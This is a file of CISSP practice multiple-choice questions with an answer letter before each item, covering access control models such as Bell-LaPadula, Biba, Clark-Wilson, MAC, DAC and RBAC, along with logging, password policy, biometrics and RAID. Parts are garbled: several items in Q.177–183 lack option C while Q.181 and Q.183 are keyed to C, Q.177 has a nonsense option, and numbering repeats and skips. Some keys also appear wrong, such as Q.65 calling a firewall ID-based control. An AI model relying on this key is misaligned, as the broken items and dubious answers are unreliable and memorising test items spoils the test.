B#CISSP3 Q.167:  Encryption is applicable to all of the following OSI/ISO layers except:  	^A: Network layer	^B: Physical layer	^C: Session layer	^D: Data link layer
A#CISSP3 Q.168:  The Computer Security Policy Model the Orange Book is based on is which of the following?  	^A: Bell-LaPadula	^B: Data Encryption Standard	^C: Kerberos	^D: Tempest
A#CISSP3 Q.169:  Which type of attack would a competitive intelligence attack best classify as?	^A: Business attack	^B: Intelligence attack	^C: Financial attack	^D: Grudge attack
C#CISSP3 Q.170:  Which of the following is responsible for the most security issues?  	^A: Outside espionage	^B: Hackers	^C: Personnel	^D: Equipment failure
A#CISSP3 Q.171:  Which of the following goals is NOT a goal of Problem Management?  	^A: To eliminate all problems.	^B: To reduce failures to a manageable level.	^C: To prevent the occurrence or re-occurrence of a problem.	^D: To mitigate the negative impact of problems on computing services and resources.
D#CISSP3 Q.172:  Examples of types of physical access controls include all except which of the following?  	^A: badges	^B: locks	^C: guards	^D: passwords
C#CISSP3 Q.173:  Which of the following statements pertaining to the (ISC)2 Code of Ethics is incorrect?	^A: All information systems security professionals who are certified by (ISC)2 recognize that such a certification is a privilege that must be both earned and maintained.	^B: All information systems security professionals who are certified by (ISC)2 shall provide diligent and competent service to principals.	^C: All information systems security professionals who are certified by (ISC)2 shall discourage such behavior as associating or preparing to associate with criminals or criminal behavior.	^D: All information systems security professionals who are certified by (ISC)2 shall promote the understanding and acceptance of prudent information security measures.
C#CISSP3 Q.174:  Which DES modes can best be used for authentication?  	^A: Cipher Block Chaining and Electronic Code Book.	^B: Cipher Block Chaining and Output Feedback.	^C: Cipher Block Chaining and Cipher Feedback.	^D: Output Feedback and Electronic Code Book.
A#CISSP3 Q.175:  In the OSI / ISO model, at what layer are some of the SLIP, CSLIP, PPP control functions provided?  	^A: Link	^B: Transport	^C: Presentation	^D: Application
B#CISSP3 Q.176:  Which of the following best describes the purpose of debugging programs?  	^A: To generate random data that can be used to test programs before implementing them	^B: To ensure that program coding flaws are detected and corrected.	^C: To protect, during the programming phase, valid changes from being overwritten by other changes.	^D: To compare source code versions before transferring to the test environment.
A#CISSP3 Q.177:  With RAID Level 5 the spare drives that replace the failed drives are usually hot swappable, meaning they can be replaced on the server while the?  	^A: System is up and running.	^B: System is down and running.		^D: System is centre and running.
A#CISSP3 Q.178:  What is the process that RAID Level 0 uses as it creates one large disk by using several disks?  	^A: Striping	^B: Mirroring		^D: Clustering
A#CISSP3 Q.179:  Which of the following is used to create and delete views and relations within tables?  	^A: SQL Data Definition Language	^B: SQL Data Manipulation Language		^D: SQL Data Identification Language
B#CISSP3 Q.180:  Which division of the Orange Book deals with discretionary protection (need-to-know)?  ^A: D	^B: C	^C: B		
C#CISSP3 Q.181:  The Diffie-Hellman algorithm is used for?  	^A: Encryption	^B: Digital signature		^D: Non-repudiation
A#CISSP3 Q.182:  Primarily run when time and tape space permit, and used for the system archive or baselined tape sets, is the?  	^A: Full backup method.	^B: Incremental backup method.		^D: Tape backup method.
C#CISSP3 Q.183:  Which of the following teams should not be included in an organization's contingency plan?  	^A: Damage assessment team.	^B: Hardware salvage team.		^D: Legal affairs team.
D#CISSP4 Q.1:  In a discretionary mode, which of the following entities is authorized to grant information access to other people?  	^A: Manager	^B: Group leader	^C: Security manager	^D: User
B#CISSP4 Q.1:  Covert channel is a communication channel that can be used for:	^A: Hardening the system.	^B: Violating the security policy.	^C: Protecting the DMZ.	^D: Strengthening the security policy.
C#CISSP4 Q.2:  To ensure that integrity is attained through the Clark and Wilson model, certain rules are needed. These rules are:	^A: Processing rules and enforcement rules.	^B: Integrity-bouncing rules.	^C: Certification rules and enforcement rules.	^D: Certification rules and general rules.
D#CISSP4 Q.3:  What was introduced for circumventing difficulties in classic approaches to computer security by limiting damage produced by malicious programs?  	^A: Integrity-preserving	^B: Ref Mon	^C: Integrity-monitoring	^D: Non-Interference
A#CISSP4 Q.4:  What is an indirect way to transmit information with no explicit reading of confidential information?  	^A: Covert channels	^B: Backdoor	^C: Timing channels	^D: Overt channels
B#CISSP4 Q.5:  Which of the following are the limitations of the BLP model?  	^A: No policies for changing access data control.	^B: All of the choices.	^C: Contains covert channels.	^D: Static in nature.
B#CISSP4 Q.6:  Which of the following are the two most well known access control models?  	^A: Lattice and Biba	^B: Bell LaPadula and Biba	^C: Bell LaPadula and Chinese Wall	^D: Bell LaPadula and Info Flow
A#CISSP4 Q.7:  What can be defined as a formal security model for the integrity of subjects and objects in a system?  	^A: Biba	^B: Bell LaPadulaLattice	^C: Lattice	^D: Info Flow
D#CISSP4 Q.8:  Which of the following is best known for capturing security requirements of commercial applications?  	^A: Lattice	^B: Biba	^C: Bell LaPadula	^D: Clark and Wilson
B#CISSP4 Q.9:  The Clark Wilson model has its emphasis on:  	^A: Security	^B: Integrity	^C: Accountability	^D: Confidentiality
B#CISSP4 Q.10:  Which of the following is a state machine model capturing confidentiality aspects of access control?  	^A: Clarke Wilson	^B: Bell-LaPadula	^C: Chinese Wall	^D: Lattice
C#CISSP4 Q.11:  With the BLP model, access permissions are defined through:  	^A: Filter rules	^B: Security labels	^C: Access Control matrix	^D: Profiles
B#CISSP4 Q.12:  With the BLP model, security policies prevent information flowing downwards from a:  	^A: Low security level	^B: High security level	^C: Medium security level	^D: Neutral security level
D#CISSP4 Q.13:  When will BLP consider the information flow that occurs?  	^A: When a subject alters an object.	^B: When a subject accesses an object.	^C: When a subject observes an object.	^D: All of the choices.
C#CISSP4 Q.14:  Separation of duties is valuable in deterring:  	^A: DoS	^B: external intruder	^C: fraud	^D: Trojan horse
C#CISSP4 Q.15:  What principle requires that for particular sets of transactions, no single individual be allowed to execute all transactions within the set?  	^A: Use of rights	^B: Balance of power	^C: Separation of duties	^D: Fair use
D#CISSP4 Q.16:  Separation of duty can be:  	^A: Dynamic only	^B: Encrypted	^C: Static only	^D: Static or dynamic
A#CISSP4 Q.17:  Who should determine the appropriate sensitivity classifications of information?  	^A: Owner	^B: Server	^C: Administrator	^D: User
A#CISSP4 Q.18:  Who should determine the appropriate access control of information?  	^A: Owner	^B: User	^C: Administrator	^D: Server
D#CISSP4 Q.19:  What principle requires that a user be given no more privilege than necessary to perform a job?  	^A: Principle of aggregate privilege.	^B: Principle of most privilege.	^C: Principle of effective privilege.	^D: Principle of least privilege.
B#CISSP4 Q.20:  To ensure least privilege requires that __________ is identified.  	^A: what the user's privilege owns	^B: what the user's job is	^C: what the user's cost is	^D: what the user's group is
B#CISSP4 Q.21:  The concept of least privilege currently exists within the context of:  	^A: ISO	^B: TCSEC	^C: OSI	^D: IETF
B#CISSP4 Q.22:  Enforcing minimum privileges for general system users can be easily achieved through the use of:  	^A: TSTEC	^B: RBAC	^C: TBAC	^D: IPSEC
B#CISSP4 Q.23:  Which of the following are potential firewall problems that should be logged?  	^A: Reboot	^B: All of the choices.	^C: Proxies restarted.	^D: Changes to configuration file.
A#CISSP4 Q.24:  Which of the following are security events on Unix that should be logged?  	^A: All of the choices.	^B: Use of Setgid.	^C: Change of permissions on system files.	^D: Use of Setuid.
B#CISSP4 Q.25:  What process determines who is trusted for a given purpose?  	^A: Identification	^B: Authorization	^C: Authentication	^D: Accounting
B#CISSP4 Q.26:  Which of the following tools can you use to assess your network's vulnerability?  	^A: ISS	^B: All of the choices.	^C: SATAN	^D: Ballista
D#CISSP4 Q.27:  Which of the following should NOT be logged for performance problems?  	^A: CPU load.	^B: Percentage of use.	^C: Percentage of idle time.	^D: None of the choices.
A#CISSP4 Q.28:  Which of the following should be logged for security problems?  	^A: Use of mount command.	^B: Percentage of idle time.	^C: Percentage of use.	^D: None of the choices.
B#CISSP4 Q.29:  Which of the following services should be logged for security purpose?  	^A: bootp	^B: All of the choices.	^C: sunrpc	^D: tftp
D#CISSP4 Q.30:  Who should NOT have access to the log files?  	^A: Security staff.	^B: Internal audit staff.	^C: System administration staff.	^D: Manager's secretary.
C#CISSP4 Q.31:  Which of the following correctly describe the use of the collected logs?  	^A: They are used in the passive monitoring process only.	^B: They are used in the active monitoring process only.	^C: They are used in the active and passive monitoring process.	^D: They are used in the archiving process only.
C#CISSP4 Q.32:  All logs are kept on archive for a period of time. What determines this period of time?  	^A: Administrator preferences.	^B: MTTR	^C: Retention policies	^D: MTTF
C#CISSP4 Q.33:  Logs must be secured to prevent:  	^A: Creation, modification, and destruction.	^B: Modification, deletion, and initialization.	^C: Modification, deletion, and destruction.	^D: Modification, deletion, and inspection.
A#CISSP4 Q.34:  To ensure dependable and secure logging, all computers must have their clock synchronized to:  	^A: A central timeserver.	^B: The log time stamp.	^C: The respective local times.	^D: None of the choices.
B#CISSP4 Q.35:  To ensure dependable and secure logging, logging information traveling on the network should be:  	^A: Stored	^B: Encrypted	^C: Isolated	^D: Monitored
A#CISSP4 Q.36:  The activity that consists of collecting information that will be used for monitoring is called:  	^A: Logging	^B: Troubleshooting	^C: Auditing	^D: Inspecting
B#CISSP4 Q.37:  How often should logging be run?  	^A: Once every week.	^B: Always	^C: Once a day.	^D: During maintenance.
A#CISSP4 Q.38:  If the computer system being used contains confidential information, users must not:  	^A: Leave their computer without first logging off.	^B: Share their desks.	^C: Encrypt their passwords.	^D: Communicate
A#CISSP4 Q.39:  Security is a process that is:  	^A: Continuous	^B: Indicative	^C: Examined	^D: Abnormal
C#CISSP4 Q.40:  Which of the following user items can be shared?  	^A: Password	^B: Home directory	^C: None of the choices.
B#CISSP4 Q.41:  Root login should only be allowed via:	^A: Rsh	^B: System console	^C: Remote program	^D: VNC
B#CISSP4 Q.42:  What should you do to the user accounts as soon as employment is terminated?  	^A: Disable the user accounts and erase immediately the data kept.	^B: Disable the user accounts and have the data kept for a specific period of time.	^C: None of the choices.	^D: Maintain the user accounts and have the data kept for a specific period of time.
D#CISSP4 Q.43:  Access to the _________ account on a Unix server must be limited to only the system administrators that must absolutely have this level of access.  	^A: Superuser of inetd.	^B: Manager or root.	^C: Fsf or root	^D: Superuser or root.
D#CISSP4 Q.44:  Which of the following correctly describe good security practice?  	^A: Accounts should be monitored regularly.	^B: You should have a procedure in place to verify password strength.	^C: You should ensure that there are no accounts without passwords.	^D: All of the choices.
A#CISSP4 Q.45:  LOMAC is a security enhancement for what operating system?  	^A: Linux	^B: Netware	^C: Solaris
B#CISSP4 Q.46:  LOMAC uses what Access Control method to protect the integrity of processes and data?  	^A: Linux based EFS.	^B: Low Water-Mark Mandatory Access Control.	^C: Linux based NFS.	^D: High Water-Mark Mandatory Access Control.
D#CISSP4 Q.47:  On Linux, LOMAC is implemented as:  	^A: Virtual addresses	^B: Registers	^C: Kernel built in functions	^D: Loadable kernel module
B#CISSP4 Q.49:  What is the method of coordinating access to resources based on the listing of permitted IP addresses?  	^A: MAC	^B: ACL	^C: DAC	^D: None of the choices.
A#CISSP4 Q.50:  With RBAC, each user can be assigned:  	^A: One or more roles.	^B: Only one role.	^C: A token role.	^D: A security token.
C#CISSP4 Q.51:  With RBAC, roles are:  	^A: Based on labels.	^B: All equal	^C: Hierarchical	^D: Based on flows.
C#CISSP4 Q.52:  With __________, access decisions are based on the roles that individual users have as part of an organization.  	^A: Server based access control.	^B: Rule based access control.	^C: Role based access control.	^D: Token based access control.
C#CISSP4 Q.53:  Under Role based access control, access rights are grouped by:  	^A: Policy name	^B: Rules	^C: Role name	^D: Sensitivity label
C#CISSP4 Q.54:  Which of the following will you consider as a role under a role based access control system?  	^A: Bank rules	^B: Bank computer	^C: Bank teller	^D: Bank network
B#CISSP4 Q.55:  Role based access control is attracting increasing attention particularly for what applications?  	^A: Scientific	^B: Commercial	^C: Security	^D: Technical
D#CISSP4 Q.56:  What is one advantage of deploying Role based access control in large networked applications?  	^A: Higher security	^B: Higher bandwidth	^C: User friendliness	^D: Lower cost
B#CISSP4 Q.57:  DAC and MAC policies can be effectively replaced by:  	^A: Rule based access control.	^B: Role based access control.	^C: Server based access control.	^D: Token based access control
B#CISSP4 Q.58:  Which of the following correctly describe Role based access control?	^A: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your user profile groups.	^B: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your organization's structure.	^C: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ticketing system.	^D: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ACL.
D#CISSP4 Q.59:  Which of the following RFC talks about Rule Based Security Policy?  	^A: 1316	^B: 1989	^C: 2717	^D: 2828
A#CISSP4 Q.60:  With Rule Based Security Policy, a security policy is based on:  	^A: Global rules imposed for all users.	^B: Local rules imposed for some users.	^C: Global rules imposed for nobody.	^D: Global rules imposed for only the local users.
C#CISSP4 Q.61:  With Rule Based Security Policy, global rules usually rely on comparison of the _______ of the resource being accessed.  	^A: A group of users.	^B: Users	^C: Sensitivity	^D: Entities
C#CISSP4 Q.62:  What control is based on a specific profile for each user?  	^A: Lattice based access control.	^B: Directory based access control.	^C: Rule based access control.	^D: ID based access control.
A#CISSP4 Q.63:  In a very large environment, which of the following is an administrative burden?  	^A: Rule based access control.	^B: Directory based access control.	^C: Lattice based access control	^D: ID based access control
A#CISSP4 Q.64:  Which of the following is a feature of the Rule based access control?  	^A: The use of profile.	^B: The use of information flow label.	^C: The use of data flow diagram.	^D: The use of token.
D#CISSP4 Q.65:  A firewall can be classified as a:  	^A: Directory based access control.	^B: Rule based access control.	^C: Lattice based access control.	^D: ID based access control.
C#CISSP4 Q.66:  The Lattice Based Access Control model was developed MAINLY to deal with:  	^A: Affinity	^B: None of the choices.	^C: Confidentiality	^D: Integrity
B#CISSP4 Q.67:  With the Lattice Based Access Control model, a security class is also called a:  	^A: Control factor	^B: Security label	^C: Mandatory number	^D: Serial ID
A#CISSP4 Q.68:  Under the Lattice Based Access Control model, a container of information is a(n):  	^A: Object	^B: Model	^C: Label
A#CISSP4 Q.69:  What Access Control model was developed to deal mainly with information flow in computer systems?  	^A: Lattice Based	^B: Integrity Based	^C: Flow Based	^D: Area Based
B#CISSP4 Q.70:  The Lattice Based Access Control model was developed to deal mainly with ___________ in computer systems.  	^A: Access control	^B: Information flow	^C: Message routes	^D: Encryption
B#CISSP4 Q.71:  In the Lattice Based Access Control model, controls are applied to:  	^A: Scripts	^B: Objects	^C: Models	^D: Factors
C#CISSP4 Q.72:  With Discretionary access controls, who determines who has access and what privilege they have?  	^A: End users.	^B: None of the choices.	^C: Resource owners.	^D: Only the administrators.
A#CISSP4 Q.73:  What defines an imposed access control level?  	^A: MAC	^B: DAC	^C: SAC	^D: CAC
B#CISSP4 Q.74:  Under MAC, who can change the category of a resource?  	^A: All users.	^B: Administrators only.	^C: All managers.	^D: None of the choices.
A#CISSP4 Q.75:  Under MAC, who may grant a right of access that is explicitly forbidden in the access control policy?  	^A: None of the choices.	^B: All users.	^C: Administrators only.	^D: All managers.
B#CISSP4 Q.76:  You may describe MAC as:  	^A: Opportunistic	^B: Prohibitive	^C: None of the choices.	^D: Permissive
B#CISSP4 Q.77:  Under MAC, which of the following is true?  	^A: All that is expressly permitted is forbidden.	^B: All that is not expressly permitted is forbidden.	^C: All that is not expressly permitted is not forbidden.	^D: None of the choices.
C#CISSP4 Q.78:  Under MAC, a clearance is a:  	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
D#CISSP4 Q.79:  Under MAC, a file is a(n):  	^A: Privilege	^B: Subject	^C: Sensitivity	^D: Object
A#CISSP4 Q.80:  Under MAC, classification reflects:  	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
A#CISSP4 Q.81:  MAC is used for:  	^A: Defining imposed access control level.	^B: Defining user preferences.	^C: None of the choices.	^D: Defining discretionary access control level.
C#CISSP4 Q.82:  With MAC, who may make decisions that bear on policy?  	^A: None of the choices.	^B: All users.	^C: Only the administrator.	^D: All users except guests.
A#CISSP4 Q.83:  With MAC, who may NOT make decisions that derive from policy?  	^A: All users except the administrator.	^B: The administrator.	^C: The power users.	^D: The guests.
B#CISSP4 Q.84:  Under the MAC control system, what is required?  	^A: Performance monitoring	^B: Labelling	^C: Sensing	^D: None of the choices
C#CISSP4 Q.85:  Access controls that are not based on the policy are characterized as:  	^A: Secret controls	^B: Mandatory controls	^C: Discretionary controls	^D: Corrective controls
A#CISSP4 Q.86:  DAC are characterized by many organizations as:  	^A: Need-to-know controls	^B: Preventive controls	^C: Mandatory adjustable controls	^D: None of the choices
C#CISSP4 Q.87:  Which of the following correctly describe DAC?  	^A: It is the most secure method.	^B: It is of the B2 class.	^C: It can extend beyond limiting which subjects can gain what type of access to which objects.	^D: It is of the B1 class.
B#CISSP4 Q.88:  Under DAC, a subject's rights must be ________ when it leaves an organization altogether.  	^A: recycled	^B: terminated	^C: suspended	^D: resumed
B#CISSP4 Q.89:  Audit trail is a category of what control?  	^A: System, Manual	^B: Detective, Technical	^C: User, Technical	^D: Detective, Manual
B#CISSP4 Q.90:  IDS is a category of what control?  	^A: Detective, Manual	^B: Detective, Technical	^C: User, Technical	^D: System, Manual
D#CISSP4 Q.91:  Which of the following is not a detective technical control?  	^A: Intrusion detection system	^B: Violation reports	^C: Honeypot	^D: None of the choices.
D#CISSP4 Q.92:  ________ Technical Controls warn of technical Access Control violations.	^A: Elusive	^B: Descriptive	^C: Corrective	^D: Detective
D#CISSP4 Q.93:  A two factor authentication method is considered as a:  	^A: Technical control	^B: Patching control	^C: Corrective control	^D: Logical control
B#CISSP4 Q.94:  Which of the following will you NOT consider as technical controls?  	^A: Access Control software	^B: Man trap	^C: Passwords	^D: Antivirus Software
D#CISSP4 Q.95:  ___________________ are the technical ways of restricting who or what can access system resources.  	^A: Preventive Manual Controls	^B: Detective Technical Controls	^C: Preventive Circuit Controls	^D: Preventive Technical Controls
B#CISSP4 Q.96:  Preventive Technical Controls is usually built:  	^A: By using MD5.	^B: Into an operating system.	^C: By security officer.	^D: By security administrator.
D#CISSP4 Q.97:  Preventive Technical Controls cannot:  	^A: Protect the OS from unauthorized modification.	^B: Protect confidential information from being disclosed to unauthorized persons.	^C: Protect the OS from unauthorized manipulation.	^D: Protect users from being monitored.
D#CISSP4 Q.98:  How do Preventive Technical Controls protect system integrity and availability?  	^A: By limiting the number of threads only.	^B: By limiting the number of system variables.	^C: By limiting the number of function calls only.	^D: By limiting the number of users and/or processes.
C#CISSP4 Q.99:  Sensor is:  	^A: Logical, Physical	^B: Corrective, Logical	^C: Detective, Physical	^D: Corrective, Physical
D#CISSP4 Q.100:  Motion detector is a feature of:  	^A: Corrective Logical Controls.	^B: Logical Physical Controls.	^C: Corrective Physical Controls.	^D: Detective Physical Controls.
A#CISSP4 Q.101:  Closed circuit TV is a feature of:  	^A: Detective Physical Controls	^B: Corrective Physical Controls	^C: Corrective Logical Controls	^D: Logical Physical Controls
B#CISSP4 Q.102:  Access control is the collection of mechanisms that permits managers of a system to exercise influence over the use of:	^A: A man guard	^B: An IS system	^C: A threshold	^D: A Trap
B#CISSP4 Q.103:  Access control allows you to exercise directing influence over which of the following aspects of a system?  	^A: Behavior, user, and content provider.	^B: Behavior, use, and content.	^C: User logs and content.	^D: None of the choices.
B#CISSP4 Q.104:  The principle of accountability is a principle by which specific action can be traced back to:  	^A: A policy	^B: An individual	^C: A group	^D: A manager
C#CISSP4 Q.105:  The principle of _________ is a principle by which specific action can be traced back to any one of your users.  	^A: Security	^B: Integrity	^C: Accountability	^D: Policy
D#CISSP4 Q.106:  According to the principle of accountability, what action should be traceable to a specific user?  	^A: Material	^B: Intangible	^C: Tangible	^D: Significant
C#CISSP4 Q.107:  A significant action has a state that enables actions on an ADP system to be traced to individuals who may then be held responsible. The actions do NOT include:   ^A: Violations of security policy.	^B: Attempted violations of security policy.	^C: Non-violations of security policy.	^D: Attempted violations of allowed actions.
A#CISSP4 Q.108:  ____________ is the means by which the ability to do something with a computer resource is explicitly enabled or restricted.	^A: Access control	^B: Type of access	^C: System resource	^D: Work permit
A#CISSP4 Q.109:  The ability to do something with a computer resource can be explicitly enabled or restricted through:  	^A: Physical and system-based controls.	^B: Theoretical and system-based controls.	^C: Mental and system-based controls.	^D: Physical and trap-based controls.
C#CISSP4 Q.110:  The main categories of access control do NOT include:	^A: Administrative Access Control	^B: Logical Access Control	^C: Random Access Control	^D: Physical Access Control
D#CISSP4 Q.111:  You have very strict Physical Access controls. At the same time you have loose Logical Access Controls. What is true about this setting?  	^A: None of the choices.	^B: It can 100% secure your environment.	^C: It may secure your environment.	^D: It may not secure your environment.
A#CISSP4 Q.112:  Which of the following is NOT a type of access control?  	^A: Intrusive	^B: Deterrent	^C: Detective	^D: Preventive
A#CISSP4 Q.113:  As a type of access control, which of the following asks for avoiding occurrence?  	^A: Preventive	^B: Deterrent	^C: Intrusive	^D: Detective
C#CISSP4 Q.114:  As a type of access control, which of the following asks for identifying occurrences?  	^A: Deterrent	^B: Preventive	^C: Detective	^D: Intrusive
C#CISSP4 Q.115:  As a type of access control, which of the following asks for discouraging occurrence?  	^A: Detective	^B: Intrusive	^C: Deterrent	^D: Preventive
C#CISSP4 Q.116:  As a type of access control, which of the following asks for restoring controls?  	^A: Deterrent	^B: Intrusive	^C: Corrective	^D: Preventive
A#CISSP4 Q.117:  What type of access control focuses on restoring resources?  	^A: Recovery	^B: Preventive	^C: Intrusive	^D: Corrective
C#CISSP4 Q.118:  What scheme includes the requirement that the system maintain the separation of duty requirement expressed in the access control triples?  	^A: Bella	^B: Lattice	^C: Clark-Wilson	^D: Bell-LaPadula
B#CISSP4 Q.119:  What is an access control model?  	^A: A formal description of access control ID specification.	^B: A formal description of security policy.	^C: A formal description of a sensibility label.	^D: None of the choices.
B#CISSP4 Q.120:  Which of the following is true about MAC?  	^A: It is more flexible than DAC.	^B: It is more secure than DAC.	^C: It is less secure than DAC.	^D: It is more scalable than DAC.
C#CISSP4 Q.121:  The access matrix model consists of which of the following parts? (Choose all that apply)  	^A: A function that returns an object's type.	^B: A list of subjects.	^C: All of the choices.	^D: A list of objects.
A#CISSP4 Q.122:  The access matrix model has which of the following common implementations?  	^A: Access control lists and capabilities.	^B: Access control lists.	^C: Capabilities.	^D: Access control list and availability.
B#CISSP4 Q.123:  What can be accomplished by storing on each subject a list of rights the subject has for every object?  	^A: Object	^B: Capabilities	^C: Key ring	^D: Rights
B#CISSP4 Q.124:  Which of the following is true regarding a secure access model?  	^A: Secure information cannot flow to a more secure user.	^B: Secure information cannot flow to a less secure user.	^C: Secure information can flow to a less secure user.	^D: None of the choices.
A#CISSP4 Q.125:  In the Information Flow Model, what relates two versions of the same object?  	^A: Flow	^B: State	^C: Transformation	^D: Successive points
D#CISSP4 Q.126:  In the Information Flow Model, what acts as a type of dependency?  	^A: State	^B: Successive points	^C: Transformation	^D: Flow
C#CISSP4 Q.127:  The lattice-based model aims at protecting against:  	^A: Illegal attributes.	^B: None of the choices.	^C: Illegal information flow among the entities.	^D: Illegal access rights
B#CISSP4 Q.128:  Which of the following are the components of the Chinese wall model?  	^A: Conflict of interest classes.	^B: All of the choices.	^C: Subject	^D: Company Datasets.
B#CISSP4 Q.129:  Which of the following correctly describe the difference between identification and authentication?  	^A: Authentication is a means to verify who you are, while identification is what you are authorized to perform.	^B: Identification is a means to verify who you are, while authentication is what you are authorized to perform.	^C: Identification is another name of authentication.	^D: Identification is the child process of authentication.
B#CISSP4 Q.130:  Identification establishes:  	^A: Authentication	^B: Accountability	^C: Authorization	^D: None of the choices.
A#CISSP4 Q.131:  Identification usually takes the form of:  	^A: Login ID.	^B: User password.	^C: None of the choices.	^D: Passphrase
D#CISSP4 Q.132:  Authentication is typically based upon:  	^A: Something you have.	^B: Something you know.	^C: Something you are.	^D: All of the choices.
B#CISSP4 Q.133:  A password represents:  	^A: Something you have.	^B: Something you know.	^C: All of the choices.	^D: Something you are.
C#CISSP4 Q.134:  A smart card represents:  	^A: Something you are.	^B: Something you know.	^C: Something you have.	^D: All of the choices.
A#CISSP4 Q.135:  Retinal scans check for:  	^A: Something you are.	^B: Something you have.	^C: Something you know.	^D: All of the choices.
D#CISSP4 Q.136:  Which of the following is the most commonly used check on something you know?  	^A: One time password	^B: Login phrase	^C: Retinal	^D: Password
A#CISSP4 Q.137:  Software generated password has what drawback?  	^A: Password not easy to remember.	^B: Password too secure.	^C: None of the choices.	^D: Password unbreakable.
B#CISSP4 Q.138:  Which of the following will you consider as most secure?  	^A: Password	^B: One time password	^C: Login phrase	^D: Login ID
C#CISSP4 Q.139:  What type of password makes use of two totally unrelated words?  	^A: Login phrase	^B: One time password	^C: Composition	^D: Login ID
D#CISSP4 Q.140:  Which of the following are the advantages of using passphrase?  	^A: Difficult to crack using brute force.	^B: Offers numerous characters.	^C: Easier to remember.	^D: All of the choices.
B#CISSP4 Q.141:  Which of the following is the correct account policy you should follow?  	^A: All of the choices.	^B: All active accounts must have a password.	^C: All active accounts must have a long and complex pass phrase.	^D: All inactive accounts must have a password.
B#CISSP4 Q.142:  On UNIX systems, passwords shall be kept:  	^A: In any location on behalf of root.	^B: In a shadow password file.	^C: In the /etc/passwd file.	^D: In root.
B#CISSP4 Q.143:  Which of the following are the correct guidelines of password deployment?  	^A: Passwords must be masked.	^B: All of the choices.	^C: Password must have a minimum of 8 characters.	^D: Password must contain a mix of both alphabetic and non-alphabetic characters.
A#CISSP4 Q.144:  Why would a 16-character password not be desirable?  	^A: Hard to remember	^B: Offers numerous characters.	^C: Difficult to crack using brute force.	^D: All of the choices.
C#CISSP4 Q.145:  Which of the following is NOT a good password deployment guideline?  	^A: Passwords must not be the same as user id or login id.	^B: Password aging must be enforced on all systems.	^C: Password must be easy to memorize.	^D: Passwords must be changed at least once every 60 days, depending on your environment.
B#CISSP4 Q.146:  Routing password can be restricted by the use of:  	^A: Password age	^B: Password history	^C: Complex password	^D: All of the choices
A#CISSP4 Q.147:  Which of the following is an effective measure against a certain type of brute force password attack? ^A: Password used must not be a word found in a dictionary.	^B: Password history is used.	^C: Password reuse is not allowed.	^D: None of the choices.
D#CISSP4 Q.148:  Which of the following are measures against password sniffing?  	^A: Passwords must not be sent through email in plain text.	^B: Passwords must not be stored in plain text on any electronic media.	^C: You may store passwords electronically if it is encrypted.	^D: All of the choices.
B#CISSP4 Q.149:  What should you do immediately if the root password is compromised?  	^A: Change the root password.	^B: Change all passwords.	^C: Increase the value of password age.	^D: Decrease the value of password history.
B#CISSP4 Q.150:  Which of the following is the most secure way to distribute password?  	^A: Employees must send in an email before obtaining a password.	^B: Employees must show up in person and present proper identification before obtaining a password.	^C: Employees must send in a signed email before obtaining a password.	^D: None of the choices.
C#CISSP4 Q.151:  Which of the following can be used to protect your system against brute force password attack?  	^A: Decrease the value of password history.	^B: Employees must send in a signed email before obtaining a password.	^C: After three unsuccessful attempts to enter a password, the account will be locked.	^D: Increase the value of password age.
C#CISSP4 Q.152:  You should keep audit trail on which of the following items?  	^A: Password usage.	^B: All unsuccessful logon.	^C: All of the choices.	^D: All successful logon.
D#CISSP4 Q.153:  What type of authentication takes advantage of an individual's unique physical characteristics in order to authenticate that person's identity?  	^A: Password	^B: Token	^C: Ticket Granting	^D: Biometric
A#CISSP4 Q.154:  Which of the following will you consider as the MOST secure way of authentication?  	^A: Biometric	^B: Password	^C: Token	^D: Ticket Granting
A#CISSP4 Q.155:  Biometric performance is most commonly measured in terms of:  	^A: FRR and FAR	^B: FAC and ERR	^C: IER and FAR	^D: FRR and GIC
B#CISSP4 Q.156:  What is known as the probability that you are not authenticated to access your account?  	^A: ERR	^B: FRR	^C: MTBF	^D: FAR
B#CISSP4 Q.157:  What is known as the chance that someone other than you is granted access to your account?  	^A: ERR	^B: FAR	^C: FRR	^D: MTBF
A#CISSP4 Q.158:  You are comparing biometric systems. Security is the top priority. A low ________ is most important in this regard.  	^A: FAR	^B: FRR	^C: MTBF	^D: ERR
D#CISSP4 Q.159:  The quality of finger prints is crucial to maintain the necessary:  	^A: FRR	^B: ERR and FAR	^C: FAR	^D: FRR and FAR
C#CISSP4 Q.160:  By requiring the user to use more than one finger to authenticate, you can:  	^A: Provide statistical improvements in EAR.	^B: Provide statistical improvements in MTBF.	^C: Provide statistical improvements in FRR.	^D: Provide statistical improvements in ERR.
B#CISSP4 Q.161:  Which of the following is being considered as the most reliable kind of personal identification?  	^A: Token	^B: Finger print	^C: Password	^D: Ticket Granting
D#CISSP4 Q.162:  Which of the following methods is more microscopic and will analyze the direction of the ridges of the fingerprints for matching?  	^A: None of the choices.	^B: Flow direct	^C: Ridge matching	^D: Minutia matching
B#CISSP4 Q.163:  Which of the following are the types of eye scan in use today?  	^A: Retinal scans and body scans.	^B: Retinal scans and iris scans.	^C: Retinal scans and reflective scans.	^D: Reflective scans and iris scans.
B#CISSP4 Q.164:  Which of the following eye scan methods is considered to be more intrusive?  	^A: Iris scans	^B: Retinal scans	^C: Body scans	^D: Reflective scans
B#CISSP4 Q.165:  Which of the following offers greater accuracy than the others?  	^A: Facial recognition	^B: Iris scanning	^C: Finger scanning	^D: Voice recognition
B#CISSP4 Q.166:  Which of the following are the valid categories of hand geometry scanning?  	^A: Electrical and image-edge detection.	^B: Mechanical and image-edge detection.	^C: Logical and image-edge detection.	^D: Mechanical and image-ridge detection.
A#CISSP4 Q.167:  In the world of keystroke dynamics, what represents the amount of time you hold down a particular key?  	^A: Dwell time	^B: Flight time	^C: Dynamic time	^D: Systems time
B#CISSP4 Q.168:  In the world of keystroke dynamics, what represents the amount of time it takes a person to switch between keys?  	^A: Dynamic time	^B: Flight time	^C: Dwell time	^D: Systems time.
D#CISSP4 Q.169:  Which of the following are the benefits of Keystroke dynamics?  	^A: Low cost	^B: Unintrusive device	^C: Transparent	^D: All of the choices.
B#CISSP4 Q.170:  DSV as an identification method check against users:	^A: Fingerprints	^B: Signature	^C: Keystrokes	^D: Facial expression
